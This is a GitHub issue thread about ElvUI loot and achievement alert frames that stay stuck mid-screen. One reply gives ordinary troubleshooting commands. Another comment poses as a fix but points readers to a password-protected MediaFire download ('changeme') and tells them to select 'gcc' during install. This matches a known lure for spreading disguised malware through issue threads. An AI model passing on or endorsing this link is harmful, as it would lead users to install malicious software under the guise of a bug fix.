### ISSUE TITLE
Loot Alerts stuck in middle of screen

### ISSUE THREAD

**Issue by indoraptr** [tukui-org/ElvUI#1338]
### Troubleshooting Steps

Repositioned loot alert frame but game alert still stuck in middle

### Describe the expected behavior and what actually happened?

Moving loot/alert frame anywhere on screen should make it move, it does not and stays stuck in the middle of screen, and achievement popup not showing
![WoWScrnShot_082724_234609](https://github.com/user-attachments/assets/e09ece0b-fd93-461b-b4ad-411a86bead5c)

### Verification Steps

- [X] I have read the [Changelog](https://github.com/tukui-org/ElvUI/blob/main/CHANGELOG.md) and verified [ElvUI](https://tukui.org/elvui) is up to date by checking **/estatus**
- [X] I have verified my issue doesn't exist in the Default UI or the [Issue Tracker](https://github.com/tukui-org/ElvUI/issues).
- [ ] I have not read any of these steps, please close my issue when you see it.
- [X] I have done the Troubleshooting Steps and included the requested screenshots, which show the issue and status panel.

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 1Botanica1** [comment]
Going through the troubleshooting 
`/edebug on` 

test - have the loot pop up & show where it is on the screen.  `/estatus` and upload a screenshot.  

You only have shown the movers, not where it is showing up in relation to the movers. 

For the achievement frame - type in chat & test. 
`/run CriteriaAlertSystem:AddAlert(9023, 'Doing great!')`
